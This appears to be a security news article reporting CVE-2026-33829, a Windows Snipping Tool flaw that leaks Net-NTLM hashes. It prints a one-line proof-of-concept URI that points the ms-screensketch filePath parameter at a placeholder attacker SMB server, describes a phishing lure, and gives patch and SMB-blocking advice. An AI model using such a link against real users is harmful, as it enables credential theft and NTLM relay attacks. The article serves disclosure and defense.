Critical Windows Snipping Tool Bug Leaks NTLM Hashes, PoC Exploit Released
Key Takeaways A critical vulnerability (CVE-2026-33829) in Microsoft’s Windows Snipping Tool has been publicly disclosed. This flaw allows attackers to steal Net-NTLM credential hashes by...
Key Takeaways
- A critical vulnerability (CVE-2026-33829) in Microsoft’s Windows Snipping Tool has been publicly disclosed.
- This flaw allows attackers to steal Net-NTLM credential hashes by luring victims to a malicious web page.
- All users of the affected Windows Snipping Tool versions should apply the April 14, 2026, security update immediately.
A significant security vulnerability within Microsoft’s popular Snipping Tool has come to light, accompanied by a publicly available proof-of-concept (PoC) exploit. This flaw enables threat actors to surreptitiously capture users’ Net-NTLM credential hashes by enticing them to visit a specially crafted web page.
Table Of Content
Designated as CVE-2026-33829, the vulnerability stems from the Snipping Tool’s handling of deep link Uniform Resource Identifier (URI) registrations, specifically those leveraging the ms-screensketch protocol schema. Affected iterations of the application register this deep link, which incorporates a filePath parameter.
The core issue lies in inadequate input validation. An attacker can exploit this by supplying a Universal Naming Convention (UNC) path that directs to a remote, attacker-controlled Server Message Block (SMB) server. This action forces an authenticated SMB connection, during which the victim’s Net-NTLM hash is transmitted and subsequently captured by the attacker.
The discovery and subsequent reporting of this vulnerability were credited to security researchers at Black Arrow, who worked in coordination with Microsoft prior to the public disclosure.
Understanding the Attack Vector
Exploiting CVE-2026-33829 requires minimal technical proficiency. Attackers merely need to host a malicious URL or an HTML page designed to automatically trigger the deep link, then persuade a target to access it. The PoC developed by Black Arrow Security illustrates this attack with a simple browser-initiated URI:
ms-screensketch:edit?&filePath=<attacker-smb-server>file.png&isTemporary=false&saved=true&source=Toast
When a user clicks this link, the Snipping Tool is activated and silently attempts to retrieve the remote resource via SMB. During this connection attempt, the Windows operating system automatically dispatches the user’s Net-NTLM authentication response to the attacker’s server. This exposes credentials that can then be subjected to offline cracking or utilized in NTLM relay attacks against other resources within the victim’s internal network.
Social Engineering Potential
What makes CVE-2026-33829 particularly concerning is its inherent suitability for social engineering tactics. Because the Snipping Tool visibly launches during the exploitation process, the attack appears legitimate and aligns with plausible scenarios, such as asking an employee to crop a corporate image, modify a badge photo, or review an HR document.
An attacker could, for instance, register a domain like snip.example.com and host an innocuous-looking image URL that, in the background, delivers the malicious deep link payload. The victim would perceive nothing out of the ordinary; the Snipping Tool would open as expected while the NTLM authentication occurs transparently.
This attack vector is especially potent within corporate environments, where phishing emails referencing internal HR portals, IT support systems, or shared document repositories are commonplace and often trusted.
Patch Availability and Timeline
Microsoft has addressed this vulnerability in its April 14, 2026, Patch Tuesday security update. The timeline for disclosure and remediation is as follows:
- March 23, 2026 — Vulnerability reported to Microsoft.
- April 14, 2026 — Microsoft releases a security patch.
- April 14, 2026 — Coordinated public advisory and PoC release.
What You Should Do
- Apply Updates Immediately: Organizations and individual users running affected versions of the Windows Snipping Tool must apply the April 14, 2026, security update without delay.
- Monitor Network Traffic: Security teams should actively monitor internal networks for any anomalous outbound SMB connections (typically on port 445) directed towards external or untrusted hosts, as this could indicate an active exploitation attempt.
- Block Outbound SMB: Implementing a policy to block outbound SMB traffic at the network perimeter is a robust defensive measure, irrespective of patch status, as it can prevent many NTLM hash theft and relay attacks.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.